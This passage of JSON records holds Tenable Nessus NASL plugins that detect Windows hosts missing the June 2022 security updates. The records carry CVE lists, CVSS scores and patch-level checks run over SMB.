multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014678\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014678\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30165\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014678',\n '5014677'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:20348,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014678, 5014677])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:51:10", "description": "The remote Windows host is missing security update 5014746. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014746: Windows Server 2012 R2 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30135", "CVE-2022-30136", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014746.NASL", "href": "https://www.tenable.com/plugins/nessus/162202", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162202);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30135\",\n \"CVE-2022-30136\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014738\");\n script_xref(name:\"MSKB\", value:\"5014746\");\n script_xref(name:\"MSFT\", value:\"MS22-5014738\");\n script_xref(name:\"MSFT\", value:\"MS22-5014746\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014746: Windows Server 2012 R2 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014746. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014746\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014746 or Cumulative Update 5014738\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014746',\n '5014738'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014746, 5014738])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:50:09", "description": "The remote Windows host is missing security update 5014741. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014741: Windows Server 2012 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30135", "CVE-2022-30136", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014741.NASL", "href": "https://www.tenable.com/plugins/nessus/162194", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162194);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30135\",\n \"CVE-2022-30136\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014741\");\n script_xref(name:\"MSKB\", value:\"5014747\");\n script_xref(name:\"MSFT\", value:\"MS22-5014741\");\n script_xref(name:\"MSFT\", value:\"MS22-5014747\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014741: Windows Server 2012 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014741. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014741\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014747\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014741 or Cumulative Update 5014747\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014747',\n '5014741'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014747, 5014741])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-16T17:48:16", "description": "The remote Windows host is missing security update 5014697. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014697: Windows 11 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30132", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014697.NASL", "href": "https://www.tenable.com/plugins/nessus/162188", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162188);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30132\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014697\");\n script_xref(name:\"MSFT\", value:\"MS22-5014697\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014697: Windows 11 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014697. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014697\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014697\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30165\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014697'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014697])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:50:41", "description": "The remote Windows host is missing security update 5014702. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, 